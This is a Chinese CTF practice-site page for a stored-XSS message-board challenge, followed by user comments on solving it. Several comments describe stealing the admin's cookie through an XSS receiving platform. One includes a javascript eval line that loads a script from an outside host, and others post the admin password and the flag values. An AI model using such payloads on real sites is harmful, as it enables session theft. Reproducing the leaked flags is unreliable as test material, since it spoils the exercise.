留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一血奖励: 5金币
解  决: 3044
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
评论
107zsm 2年前

UrlEncode编码/解码

回复 0

几度夕阳红 2年前

我认为的正常思路:1、在留言板插入XSS代码 2、管理员观看留言,触发XSS代码 3、XSS平台接收到管理员cookie信息,这里的cookie就是flag。但是不知道靶场是否实现了管理员触发XSS的机制,XSS平台一直未接收到信息。大家伙的解法,使用工具扫描网站,发现admin.php,和你大概率扫不到的db.sql文件,db.sql有admin的账号密码。登录admin界面,会触发你写入的XS

回复 2
Robuntu 2年前

@harry 大佬,我用的xss平台一直没有收到信息,请问是payload的问题吗

回复 0

harry 管理员 2年前

已经实现了管理员触发XSS的机制

回复 2

星之队队大队长 2年前

先输入payload 然后 admin.php user: admin password: 011be4d65feac1a8 登录即可

回复 1

问题小子 2年前

纯小白,这道题怎么做啊

回复 2

xcxy 2年前

用御剑工具扫描不出文件目录,直接xss平台代码插入就行了,也不用变形,能够收到cookie : flag=flag%7B5b10e075f4319e7f628f6813ca4a1904%7D,这个是url编码,解码就行了。题目应该是改了,太简单了

回复 0

32130262 2年前

我用xss.pt生成的脚本,放入留言框里,换了很多格式。还使用F12 console 里输入javascript:eval('window.s=document.createElement("script");window.s.src="https://0x.ax/o0fK";document.body.appendChild(window.s)'),xss

回复 0

Wjustice 2年前

复盘一下,直接上工具得出后台路径,然后插入图片xss,导出flag,估计是改了题,以前应该是还有个dp.sql文件。。。。。

回复 4

Amibaba 2年前

/admin.php登录后台,账号admin 密码 011be4d65feac1a8,控制台打cookie,alert(document.cookie)

回复 0

Cmy520CTF 2年前

链接后面加 /admin.php回车 账号admin 密码 011be4d65feac1a8 然后点击login得到 flag=flag%7Bce56da59371f9eec3569e6feca58eeff%7D 转成 flag{ce56da59371f9eec3569e6feca58eeff}就是答案

回复 0

嵌入式学的CTF 2年前

题改了,不需要后台也扫不到后台,只有一个管理员且无法注入,只能灵活XSS,而且服务器很慢耐心等待,我一直以为没反应改了半天pd

回复 0

WriteUp

image
丶我亚索贼六

5 金币

评分(18)

解题动态

solomom 攻破了该题 2小时前
泡泡鱼 攻破了该题 3小时前
walkerming 攻破了该题 1天前
吴王饭差 攻破了该题 1天前
2177989632 攻破了该题 1天前
zcgzcx1234 攻破了该题 1天前
aaaaab 攻破了该题 1天前
2021060287 攻破了该题 2天前
lianhaorui 攻破了该题 3天前
xiaona1111 攻破了该题 5天前
Adwuwuuuuc 攻破了该题 5天前
(eleven) 攻破了该题 6天前
3396516192 攻破了该题 7天前
azzr997 攻破了该题 8天前
15321809027 攻破了该题 9天前
eason2023 攻破了该题 9天前
huasir 攻破了该题 11天前
孙燕姿圈外男友 攻破了该题 11天前
1045123 攻破了该题 11天前
tianhe 攻破了该题 11天前
问题反馈